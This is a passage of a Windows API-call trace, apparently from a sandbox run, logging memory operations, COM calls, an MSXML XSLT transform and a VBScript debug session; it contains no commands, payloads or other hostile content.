[0566.087] memcpy (in: _Dst=0x37e324, _Src=0x1fe6f4a, _Size=0x10 | out: _Dst=0x37e324) returned 0x37e324
[0566.087] memcpy (in: _Dst=0x37e36c, _Src=0x1fe6f5c, _Size=0x18 | out: _Dst=0x37e36c) returned 0x37e36c
[0566.087] memcpy (in: _Dst=0x37e3bc, _Src=0x1fe6f76, _Size=0x2 | out: _Dst=0x37e3bc) returned 0x37e3bc
[0566.087] memcpy (in: _Dst=0x37e3f4, _Src=0x1fe6fc4, _Size=0x6 | out: _Dst=0x37e3f4) returned 0x37e3f4
[0566.087] malloc (_Size=0x808) returned 0x3803f0
[0566.087] memcpy (in: _Dst=0x37e42c, _Src=0x1fe6ff0, _Size=0xa | out: _Dst=0x37e42c) returned 0x37e42c
[0566.087] memcpy (in: _Dst=0x37e46c, _Src=0x1fe6ffc, _Size=0x8 | out: _Dst=0x37e46c) returned 0x37e46c
[0566.087] memcpy (in: _Dst=0x37e4ac, _Src=0x1fe7018, _Size=0x2 | out: _Dst=0x37e4ac) returned 0x37e4ac
[0566.088] memcpy (in: _Dst=0x37e4e4, _Src=0x1fe702c, _Size=0x8 | out: _Dst=0x37e4e4) returned 0x37e4e4
[0566.088] memcpy (in: _Dst=0x37e524, _Src=0x18f64c, _Size=0x20 | out: _Dst=0x37e524) returned 0x37e524
[0566.088] memcpy (in: _Dst=0x37e57c, _Src=0x1fe709c, _Size=0xa | out: _Dst=0x37e57c) returned 0x37e57c
[0566.088] memcpy (in: _Dst=0x37e5bc, _Src=0x1fe70b2, _Size=0x6 | out: _Dst=0x37e5bc) returned 0x37e5bc
[0566.088] memcpy (in: _Dst=0x37e5f4, _Src=0x1fe70f8, _Size=0x8 | out: _Dst=0x37e5f4) returned 0x37e5f4
[0566.089] memcpy (in: _Dst=0x37e634, _Src=0x1fe711a, _Size=0x8 | out: _Dst=0x37e634) returned 0x37e634
[0566.089] memcpy (in: _Dst=0x37e674, _Src=0x1fe7162, _Size=0x16 | out: _Dst=0x37e674) returned 0x37e674
[0566.089] malloc (_Size=0x1008) returned 0x380c00
[0566.089] memcpy (in: _Dst=0x37e6bc, _Src=0x1fe7218, _Size=0x12 | out: _Dst=0x37e6bc) returned 0x37e6bc
[0566.089] memcpy (in: _Dst=0x37e704, _Src=0x1fe7242, _Size=0xa | out: _Dst=0x37e704) returned 0x37e704
[0566.089] memcpy (in: _Dst=0x37e744, _Src=0x1fe7250, _Size=0x8 | out: _Dst=0x37e744) returned 0x37e744
[0566.090] memcpy (in: _Dst=0x37e784, _Src=0x1fe7262, _Size=0xe | out: _Dst=0x37e784) returned 0x37e784
[0566.090] memcpy (in: _Dst=0x37e7c4, _Src=0x1fe727a, _Size=0x4 | out: _Dst=0x37e7c4) returned 0x37e7c4
[0566.090] memcpy (in: _Dst=0x37e7fc, _Src=0x1fe7292, _Size=0x8 | out: _Dst=0x37e7fc) returned 0x37e7fc
[0566.090] memcpy (in: _Dst=0x37e83c, _Src=0x1fe7338, _Size=0x4 | out: _Dst=0x37e83c) returned 0x37e83c
[0566.090] memcpy (in: _Dst=0x37e874, _Src=0x1fe733e, _Size=0x14 | out: _Dst=0x37e874) returned 0x37e874
[0566.090] memcpy (in: _Dst=0x37e8bc, _Src=0x1fe7354, _Size=0x18 | out: _Dst=0x37e8bc) returned 0x37e8bc
[0566.090] memcpy (in: _Dst=0x37e90c, _Src=0x18f64c, _Size=0x8 | out: _Dst=0x37e90c) returned 0x37e90c
[0566.090] memcpy (in: _Dst=0x37e94c, _Src=0x1fe737e, _Size=0xa | out: _Dst=0x37e94c) returned 0x37e94c
[0566.090] memcpy (in: _Dst=0x37e98c, _Src=0x1fe7392, _Size=0x8 | out: _Dst=0x37e98c) returned 0x37e98c
[0566.091] memcpy (in: _Dst=0x37e9cc, _Src=0x1fe7502, _Size=0xe | out: _Dst=0x37e9cc) returned 0x37e9cc
[0566.091] memcpy (in: _Dst=0x37ea0c, _Src=0x1fe7518, _Size=0x10 | out: _Dst=0x37ea0c) returned 0x37ea0c
[0566.091] memcpy (in: _Dst=0x37ea54, _Src=0x18f64c, _Size=0x1c | out: _Dst=0x37ea54) returned 0x37ea54
[0566.092] memcpy (in: _Dst=0x37eaa4, _Src=0x1fe7574, _Size=0x1a | out: _Dst=0x37eaa4) returned 0x37eaa4
[0566.092] memcpy (in: _Dst=0x37eaf4, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37eaf4) returned 0x37eaf4
[0566.092] memcpy (in: _Dst=0x37eb2c, _Src=0x1fe75f2, _Size=0x14 | out: _Dst=0x37eb2c) returned 0x37eb2c
[0566.092] memcpy (in: _Dst=0x37eb74, _Src=0x1fe7608, _Size=0x14 | out: _Dst=0x37eb74) returned 0x37eb74
[0566.092] memcpy (in: _Dst=0x37ebbc, _Src=0x1fe761e, _Size=0xc | out: _Dst=0x37ebbc) returned 0x37ebbc
[0566.092] memcpy (in: _Dst=0x37ebfc, _Src=0x18f64c, _Size=0x8 | out: _Dst=0x37ebfc) returned 0x37ebfc
[0566.092] memcpy (in: _Dst=0x37ec3c, _Src=0x1fe769a, _Size=0x12 | out: _Dst=0x37ec3c) returned 0x37ec3c
[0566.092] memcpy (in: _Dst=0x37ec84, _Src=0x1fe76b2, _Size=0x6 | out: _Dst=0x37ec84) returned 0x37ec84
[0566.092] memcpy (in: _Dst=0x37ecbc, _Src=0x1fe76ba, _Size=0x8 | out: _Dst=0x37ecbc) returned 0x37ecbc
[0566.092] memcpy (in: _Dst=0x37ecfc, _Src=0x1fe76d0, _Size=0x4 | out: _Dst=0x37ecfc) returned 0x37ecfc
[0566.093] memcpy (in: _Dst=0x37ed34, _Src=0x18f64c, _Size=0xc | out: _Dst=0x37ed34) returned 0x37ed34
[0566.093] memcpy (in: _Dst=0x37ed74, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37ed74) returned 0x37ed74
[0566.093] malloc (_Size=0x2008) returned 0x381c10
[0566.093] memcpy (in: _Dst=0x37edac, _Src=0x1fe77e0, _Size=0x1c | out: _Dst=0x37edac) returned 0x37edac
[0566.093] memcpy (in: _Dst=0x37edfc, _Src=0x1fe7818, _Size=0xc | out: _Dst=0x37edfc) returned 0x37edfc
[0566.093] memcpy (in: _Dst=0x37ee3c, _Src=0x18f64c, _Size=0xc | out: _Dst=0x37ee3c) returned 0x37ee3c
[0566.094] memcpy (in: _Dst=0x37ee7c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37ee7c) returned 0x37ee7c
[0566.095] memcpy (in: _Dst=0x37eeb4, _Src=0x18f64c, _Size=0x4 | out: _Dst=0x37eeb4) returned 0x37eeb4
[0566.095] memcpy (in: _Dst=0x37eeec, _Src=0x1fe7ae0, _Size=0x8 | out: _Dst=0x37eeec) returned 0x37eeec
[0566.095] memcpy (in: _Dst=0x37ef2c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37ef2c) returned 0x37ef2c
[0566.095] memcpy (in: _Dst=0x37ef64, _Src=0x18f64c, _Size=0x24 | out: _Dst=0x37ef64) returned 0x37ef64
[0566.095] memcpy (in: _Dst=0x37efbc, _Src=0x1fe7bf4, _Size=0xc | out: _Dst=0x37efbc) returned 0x37efbc
[0566.096] memcpy (in: _Dst=0x37effc, _Src=0x1fe7c04, _Size=0x8 | out: _Dst=0x37effc) returned 0x37effc
[0566.096] memcpy (in: _Dst=0x37f03c, _Src=0x1fe7c10, _Size=0x10 | out: _Dst=0x37f03c) returned 0x37f03c
[0566.096] memcpy (in: _Dst=0x37f084, _Src=0x1fe7c24, _Size=0x1c | out: _Dst=0x37f084) returned 0x37f084
[0566.096] memcpy (in: _Dst=0x37f0d4, _Src=0x1fe7c44, _Size=0x1a | out: _Dst=0x37f0d4) returned 0x37f0d4
[0566.096] memcpy (in: _Dst=0x37f124, _Src=0x1fe7c62, _Size=0x16 | out: _Dst=0x37f124) returned 0x37f124
[0566.096] memcpy (in: _Dst=0x37f16c, _Src=0x1fe7c7c, _Size=0x14 | out: _Dst=0x37f16c) returned 0x37f16c
[0566.096] memcpy (in: _Dst=0x37f1b4, _Src=0x1fe7cc0, _Size=0x16 | out: _Dst=0x37f1b4) returned 0x37f1b4
[0566.096] memcpy (in: _Dst=0x37f1fc, _Src=0x18f64c, _Size=0x1e | out: _Dst=0x37f1fc) returned 0x37f1fc
[0566.096] memcpy (in: _Dst=0x37f24c, _Src=0x18f64c, _Size=0x20 | out: _Dst=0x37f24c) returned 0x37f24c
[0566.096] memcpy (in: _Dst=0x37f2a4, _Src=0x1fe7d78, _Size=0x6 | out: _Dst=0x37f2a4) returned 0x37f2a4
[0566.097] memcpy (in: _Dst=0x37f2dc, _Src=0x1fe7da0, _Size=0x20 | out: _Dst=0x37f2dc) returned 0x37f2dc
[0566.097] memcpy (in: _Dst=0x37f334, _Src=0x18f64c, _Size=0x8 | out: _Dst=0x37f334) returned 0x37f334
[0566.097] memcpy (in: _Dst=0x37f374, _Src=0x1fe7dde, _Size=0x6 | out: _Dst=0x37f374) returned 0x37f374
[0566.097] memcpy (in: _Dst=0x37f3ac, _Src=0x1fe7df8, _Size=0x4 | out: _Dst=0x37f3ac) returned 0x37f3ac
[0566.097] memcpy (in: _Dst=0x37f3e4, _Src=0x1fe7dfe, _Size=0xe | out: _Dst=0x37f3e4) returned 0x37f3e4
[0566.097] memcpy (in: _Dst=0x37f424, _Src=0x18f64c, _Size=0x4 | out: _Dst=0x37f424) returned 0x37f424
[0566.097] memcpy (in: _Dst=0x37f45c, _Src=0x1fe7e72, _Size=0x8 | out: _Dst=0x37f45c) returned 0x37f45c
[0566.098] memcpy (in: _Dst=0x37f49c, _Src=0x18f64c, _Size=0x24 | out: _Dst=0x37f49c) returned 0x37f49c
[0566.098] memcpy (in: _Dst=0x37f4f4, _Src=0x18f64c, _Size=0x12 | out: _Dst=0x37f4f4) returned 0x37f4f4
[0566.099] memcpy (in: _Dst=0x37f53c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37f53c) returned 0x37f53c
[0566.099] memcpy (in: _Dst=0x37f574, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37f574) returned 0x37f574
[0566.099] memcpy (in: _Dst=0x37f5ac, _Src=0x18f64c, _Size=0x1e | out: _Dst=0x37f5ac) returned 0x37f5ac
[0566.100] memcpy (in: _Dst=0x37f5fc, _Src=0x18f64c, _Size=0x12 | out: _Dst=0x37f5fc) returned 0x37f5fc
[0566.100] malloc (_Size=0x4008) returned 0x383c20
[0566.100] memcpy (in: _Dst=0x37f644, _Src=0x18f64c, _Size=0x14 | out: _Dst=0x37f644) returned 0x37f644
[0566.101] memcpy (in: _Dst=0x37f68c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37f68c) returned 0x37f68c
[0566.103] free (_Block=0x37dfd0)
[0566.103] free (_Block=0x18e5d0)
[0566.103] ??3@YAXPEAX@Z () returned 0x74007400820001
[0566.104] free (_Block=0x18f770)
[0566.104] free (_Block=0x38bf70)
[0566.104] free (_Block=0x387f60)
[0566.104] free (_Block=0x383c20)
[0566.104] free (_Block=0x381c10)
[0566.105] free (_Block=0x380c00)
[0566.105] free (_Block=0x3803f0)
[0566.105] free (_Block=0x37ffe0)
[0566.106] free (_Block=0x18fb80)
[0566.106] free (_Block=0x18ab20)
[0566.106] ??2@YAPEAX_K@Z () returned 0x18e5d0
[0566.106] ??2@YAPEAX_K@Z () returned 0x18cf40
[0566.106] malloc (_Size=0x10) returned 0x189560
[0566.106] memcpy (in: _Dst=0x189560, _Src=0xaec00, _Size=0x10 | out: _Dst=0x189560) returned 0x189560
[0566.107] free (_Block=0x18d950)
[0566.108] GetUserDefaultLCID () returned 0x409
[0566.108] GetACP () returned 0x4e4
[0566.108] ??3@YAXPEAX@Z () returned 0x740075007e0001
[0566.108] ISystemDebugEventFire:EndSession (This=0x30b4e0) returned 0x0
[0566.108] IUnknown:Release (This=0x30b4e0) returned 0x1
[0566.108] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.108] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.110] IUnknown:Release (This=0x30b4e0) returned 0x0
[0566.110] DllRegisterServer () returned 0x0
[0566.110] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x1fd7620, ppProcessor=0xaf1c0 | out: ppProcessor=0xaf1c0*=0x1fd9640) returned 0x0
[0566.111] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x1fd71d0) returned 0x2
[0566.111] IXSLProcessor:put_input (This=0x1fd9640, input=0xaf400*(varType=0x9, wReserved1=0xf59a, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x1fd71d0, varVal2=0x1)) returned 0x0
[0566.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0566.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x60, lpConsoleScreenBufferInfo=0xaf0c0 | out: lpConsoleScreenBufferInfo=0xaf0c0) returned 0
[0566.118] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0566.118] GetFileType (hFile=0x60) returned 0x3
[0566.118] IXSLProcessor:transform (in: This=0x1fd9640, pDone=0xaf478 | out: pDone=0xaf478*=0xffff) returned 0x0
[0566.132] GetCurrentThreadId () returned 0x440
[0566.133] ??2@YAPEAX_K@Z () returned 0x18d7f0
[0566.133] ??2@YAPEAX_K@Z () returned 0x188740
[0566.133] GetCurrentThreadId () returned 0x440
[0566.133] ??2@YAPEAX_K@Z () returned 0x18d8c0
[0566.133] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0566.133] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xaeee0, cchData=6 | out: lpLCData="1252") returned 5
[0566.133] IsValidCodePage (CodePage=0x4e4) returned 1
[0566.133] DllRegisterServer () returned 0x0
[0566.133] CoCreateInstance (in: rclsid=0x7fef591d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef591d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x18e588 | out: ppv=0x18e588*=0x30b4e0) returned 0x0
[0566.134] IUnknown:AddRef (This=0x30b4e0) returned 0x2
[0566.134] GetCurrentProcessId () returned 0x520
[0566.134] GetCurrentThreadId () returned 0x440
[0566.134] GetTickCount () returned 0x25dc3
[0566.134] ISystemDebugEventFire:BeginSession (This=0x30b4e0, guidSourceID=0x7fef591d5d8, strSessionName="VBScript:00001312:00001088:00155075") returned 0x0
[0566.134] GetCurrentThreadId () returned 0x440
[0566.134] ??2@YAPEAX_K@Z () returned 0x18d950
[0566.134] ??2@YAPEAX_K@Z () returned 0x189040
[0566.135] ??2@YAPEAX_K@Z () returned 0x18d9a0
[0566.135] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.137] malloc (_Size=0x988) returned 0x18e630
[0566.137] GetCurrentThreadId () returned 0x440
[0566.137] DllRegisterServer () returned 0x0
[0566.137] ??2@YAPEAX_K@Z () returned 0x18d9f0
[0566.216] ??2@YAPEAX_K@Z () returned 0x18efc0
[0566.216] malloc (_Size=0x80) returned 0x18f0c0
[0566.216] malloc (_Size=0x108) returned 0x18ab20
[0566.216] memcpy (in: _Dst=0x18ab68, _Src=0x38c468, _Size=0x1a | out: _Dst=0x18ab68) returned 0x18ab68
[0566.216] ??2@YAPEAX_K@Z () returned 0x18f150
[0566.217] memcpy (in: _Dst=0x18abc8, _Src=0x38c48c, _Size=0xc | out: _Dst=0x18abc8) returned 0x18abc8
[0566.217] ??2@YAPEAX_K@Z () returned 0x18f1a0
[0566.217] malloc (_Size=0x208) returned 0x18f1f0
[0566.217] memcpy (in: _Dst=0x18f238, _Src=0x38c4a0, _Size=0x18 | out: _Dst=0x18f238) returned 0x18f238
[0566.217] ??2@YAPEAX_K@Z () returned 0x18f400
[0566.218] memcpy (in: _Dst=0x18f290, _Src=0x38c4c0, _Size=0x14 | out: _Dst=0x18f290) returned 0x18f290
[0566.218] ??2@YAPEAX_K@Z () returned 0x18f450
[0566.218] memcpy (in: _Dst=0x18f2e8, _Src=0x38c4dc, _Size=0x1c | out: _Dst=0x18f2e8) returned 0x18f2e8
[0566.218] ??2@YAPEAX_K@Z () returned 0x18f4a0
[0566.218] memcpy (in: _Dst=0x18f348, _Src=0x38c500, _Size=0x14 | out: _Dst=0x18f348) returned 0x18f348
[0566.218] GetCurrentThreadId () returned 0x440
[0566.219] memcpy (in: _Dst=0x18f3a0, _Src=0x38c51c, _Size=0xc | out: _Dst=0x18f3a0) returned 0x18f3a0
[0566.219] GetCurrentThreadId () returned 0x440
[0566.219] malloc (_Size=0x408) returned 0x18f4f0
[0566.219] memcpy (in: _Dst=0x18f538, _Src=0x38c530, _Size=0x12 | out: _Dst=0x18f538) returned 0x18f538
[0566.219] GetCurrentThreadId () returned 0x440
[0566.219] memcpy (in: _Dst=0x18f590, _Src=0x38c54c, _Size=0xe | out: _Dst=0x18f590) returned 0x18f590
[0566.219] GetCurrentThreadId () returned 0x440
[0566.219] memcpy (in: _Dst=0x18f5e0, _Src=0x38c564, _Size=0x6 | out: _Dst=0x18f5e0) returned 0x18f5e0
[0566.219] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f628, _Src=0x38c574, _Size=0xc | out: _Dst=0x18f628) returned 0x18f628
[0566.220] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f678, _Src=0x38c588, _Size=0x12 | out: _Dst=0x18f678) returned 0x18f678
[0566.220] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f6d0, _Src=0x38c5a4, _Size=0x14 | out: _Dst=0x18f6d0) returned 0x18f6d0
[0566.220] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f728, _Src=0x38c5c0, _Size=0xa | out: _Dst=0x18f728) returned 0x18f728
[0566.221] GetCurrentThreadId () returned 0x440
[0566.221] memcpy (in: _Dst=0x18f778, _Src=0x38c5d4, _Size=0x1a | out: _Dst=0x18f778) returned 0x18f778
[0566.221] ??2@YAPEAX_K@Z () returned 0x18f900
[0566.292] GetCurrentThreadId () returned 0x440
[0566.292] DllRegisterServer () returned 0x0
[0566.292] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.293] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.305] GetCurrentThreadId () returned 0x440
[0566.306] DllRegisterServer () returned 0x0
[0566.307] GetCurrentThreadId () returned 0x440
[0566.307] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.307] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.307] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.307] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.307] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.307] malloc (_Size=0x1008) returned 0x390440
[0566.307] ??2@YAPEAX_K@Z () returned 0x391450
[0566.307] malloc (_Size=0x2008) returned 0x3915e0
[0566.307] memcpy (in: _Dst=0x391614, _Src=0x25b1a50, _Size=0x18 | out: _Dst=0x391614) returned 0x391614
[0566.307] malloc (_Size=0x108) returned 0x18ac30
[0566.308] memcpy (in: _Dst=0x391664, _Src=0x25b1a6a, _Size=0x8 | out: _Dst=0x391664) returned 0x391664
[0566.308] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.308] malloc (_Size=0x208) returned 0x3935f0
[0566.308] malloc (_Size=0x40) returned 0x18d9a0
[0566.308] malloc (_Size=0x138) returned 0x18fe90
[0566.308] memcpy (in: _Dst=0x18fe90, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x18fe90) returned 0x18fe90
[0566.308] memcpy (in: _Dst=0x18fec8, _Src=0x391664, _Size=0xa | out: _Dst=0x18fec8) returned 0x18fec8
[0566.308] memcpy (in: _Dst=0x18fedc, _Src=0x391614, _Size=0x1a | out: _Dst=0x18fedc) returned 0x18fedc
[0566.308] memcpy (in: _Dst=0x18fef8, _Src=0x0, _Size=0x0 | out: _Dst=0x18fef8) returned 0x18fef8
[0566.308] memcpy (in: _Dst=0x18fef8, _Src=0x18d9a0, _Size=0x8 | out: _Dst=0x18fef8) returned 0x18fef8
[0566.308] memcpy (in: _Dst=0x18ff08, _Src=0xaed80, _Size=0x20 | out: _Dst=0x18ff08) returned 0x18ff08
[0566.308] memcpy (in: _Dst=0x18ff28, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x18ff28) returned 0x18ff28
[0566.308] memcpy (in: _Dst=0x18ff58, _Src=0x25b1a50, _Size=0x24 | out: _Dst=0x18ff58) returned 0x18ff58
[0566.308] memcpy (in: _Dst=0x18ff80, _Src=0x393610, _Size=0x30 | out: _Dst=0x18ff80) returned 0x18ff80
[0566.308] memcpy (in: _Dst=0x18ffb0, _Src=0x39364c, _Size=0x13 | out: _Dst=0x18ffb0) returned 0x18ffb0
[0566.308] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.309] free (_Block=0x3915e0)
[0566.310] free (_Block=0x390440)
[0566.310] ??3@YAXPEAX@Z () returned 0x74007600820001
[0566.310] free (_Block=0x18d9a0)
[0566.310] free (_Block=0x3935f0)
[0566.312] free (_Block=0x18ac30)
[0566.312] ??2@YAPEAX_K@Z () returned 0x390440
[0566.312] realloc (_Block=0x189560, _Size=0x40) returned 0x18d9a0
[0566.312] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.313] ??2@YAPEAX_K@Z () returned 0x3904a0
[0566.313] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.313] GetCurrentThreadId () returned 0x440
[0566.313] DllRegisterServer () returned 0x0
[0566.314] memcpy (in: _Dst=0x18f7d8, _Src=0x18fec8, _Size=0xa | out: _Dst=0x18f7d8) returned 0x18f7d8
[0566.315] GetCurrentThreadId () returned 0x440
[0566.315] DllRegisterServer () returned 0x0
[0566.316] ??3@YAXPEAX@Z () returned 0x4d01
[0566.316] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.317] free (_Block=0x18fe90)
[0566.317] ??3@YAXPEAX@Z () returned 0x20016700580001
[0566.317] ??3@YAXPEAX@Z () returned 0x4d01
[0566.317] free (_Block=0x18fdc0)
[0566.319] GetCurrentThreadId () returned 0x440
[0566.319] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.319] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.319] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.319] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.319] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.319] malloc (_Size=0x1008) returned 0x390440
[0566.319] ??2@YAPEAX_K@Z () returned 0x391450
[0566.319] malloc (_Size=0x2008) returned 0x3915e0
[0566.319] memcpy (in: _Dst=0x391614, _Src=0x25b1b20, _Size=0x16 | out: _Dst=0x391614) returned 0x391614
[0566.319] malloc (_Size=0x108) returned 0x18ac30
[0566.320] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.320] malloc (_Size=0x208) returned 0x3935f0
[0566.320] malloc (_Size=0x40) returned 0x18fe90
[0566.320] malloc (_Size=0x110) returned 0x391450
[0566.320] memcpy (in: _Dst=0x391450, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x391450) returned 0x391450
[0566.320] memcpy (in: _Dst=0x391488, _Src=0x391614, _Size=0x18 | out: _Dst=0x391488) returned 0x391488
[0566.320] memcpy (in: _Dst=0x3914a0, _Src=0x0, _Size=0x0 | out: _Dst=0x3914a0) returned 0x3914a0
[0566.320] memcpy (in: _Dst=0x3914a0, _Src=0x18fe90, _Size=0x8 | out: _Dst=0x3914a0) returned 0x3914a0
[0566.320] memcpy (in: _Dst=0x3914b0, _Src=0xaed80, _Size=0x20 | out: _Dst=0x3914b0) returned 0x3914b0
[0566.320] memcpy (in: _Dst=0x3914d0, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x3914d0) returned 0x3914d0
[0566.320] memcpy (in: _Dst=0x391500, _Src=0x25b1b20, _Size=0x1a | out: _Dst=0x391500) returned 0x391500
[0566.320] memcpy (in: _Dst=0x391520, _Src=0x393610, _Size=0x30 | out: _Dst=0x391520) returned 0x391520
[0566.320] memcpy (in: _Dst=0x391550, _Src=0x39364c, _Size=0xe | out: _Dst=0x391550) returned 0x391550
[0566.320] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.321] free (_Block=0x3915e0)
[0566.321] free (_Block=0x390440)
[0566.321] ??3@YAXPEAX@Z () returned 0x74007700820001
[0566.321] free (_Block=0x18fe90)
[0566.322] free (_Block=0x3935f0)
[0566.322] free (_Block=0x18ac30)
[0566.322] ??2@YAPEAX_K@Z () returned 0x18fe90
[0566.322] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.323] ??2@YAPEAX_K@Z () returned 0x18fef0
[0566.323] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.323] GetCurrentThreadId () returned 0x440
[0566.323] DllRegisterServer () returned 0x0
[0566.324] GetCurrentThreadId () returned 0x440
[0566.324] DllRegisterServer () returned 0x0
[0566.324] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.324] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.324] free (_Block=0x391450)
[0566.324] ??3@YAXPEAX@Z () returned 0x20016800580001
[0566.325] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.325] free (_Block=0x18fdc0)
[0566.325] GetCurrentThreadId () returned 0x440
[0566.325] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.325] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.325] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.325] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.325] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.325] malloc (_Size=0x1008) returned 0x390440
[0566.325] ??2@YAPEAX_K@Z () returned 0x391450
[0566.325] malloc (_Size=0x2008) returned 0x3915e0
[0566.325] memcpy (in: _Dst=0x391614, _Src=0x25b1cd0, _Size=0x12 | out: _Dst=0x391614) returned 0x391614
[0566.325] malloc (_Size=0x108) returned 0x18ac30
[0566.326] memcpy (in: _Dst=0x39165c, _Src=0x25b1ce4, _Size=0x8 | out: _Dst=0x39165c) returned 0x39165c
[0566.326] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.326] malloc (_Size=0x208) returned 0x3935f0
[0566.326] malloc (_Size=0x40) returned 0x18fe90
[0566.326] malloc (_Size=0x128) returned 0x391450
[0566.326] memcpy (in: _Dst=0x391450, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x391450) returned 0x391450
[0566.326] memcpy (in: _Dst=0x391488, _Src=0x39165c, _Size=0xa | out: _Dst=0x391488) returned 0x391488
[0566.326] memcpy (in: _Dst=0x39149c, _Src=0x391614, _Size=0x14 | out: _Dst=0x39149c) returned 0x39149c
[0566.326] memcpy (in: _Dst=0x3914b0, _Src=0x0, _Size=0x0 | out: _Dst=0x3914b0) returned 0x3914b0
[0566.326] memcpy (in: _Dst=0x3914b0, _Src=0x18fe90, _Size=0x8 | out: _Dst=0x3914b0) returned 0x3914b0
[0566.326] memcpy (in: _Dst=0x3914c0, _Src=0xaed80, _Size=0x20 | out: _Dst=0x3914c0) returned 0x3914c0
[0566.326] memcpy (in: _Dst=0x3914e0, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x3914e0) returned 0x3914e0
[0566.326] memcpy (in: _Dst=0x391510, _Src=0x25b1cd0, _Size=0x1e | out: _Dst=0x391510) returned 0x391510
[0566.326] memcpy (in: _Dst=0x391530, _Src=0x393610, _Size=0x30 | out: _Dst=0x391530) returned 0x391530
[0566.326] memcpy (in: _Dst=0x391560, _Src=0x39364c, _Size=0x13 | out: _Dst=0x391560) returned 0x391560
[0566.326] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.327] free (_Block=0x3915e0)
[0566.327] free (_Block=0x390440)
[0566.327] ??3@YAXPEAX@Z () returned 0x74007800820001
[0566.327] free (_Block=0x18fe90)
[0566.328] free (_Block=0x3935f0)
[0566.328] free (_Block=0x18ac30)
[0566.328] ??2@YAPEAX_K@Z () returned 0x18fe90
[0566.328] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.329] ??2@YAPEAX_K@Z () returned 0x18fef0
[0566.329] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.329] GetCurrentThreadId () returned 0x440
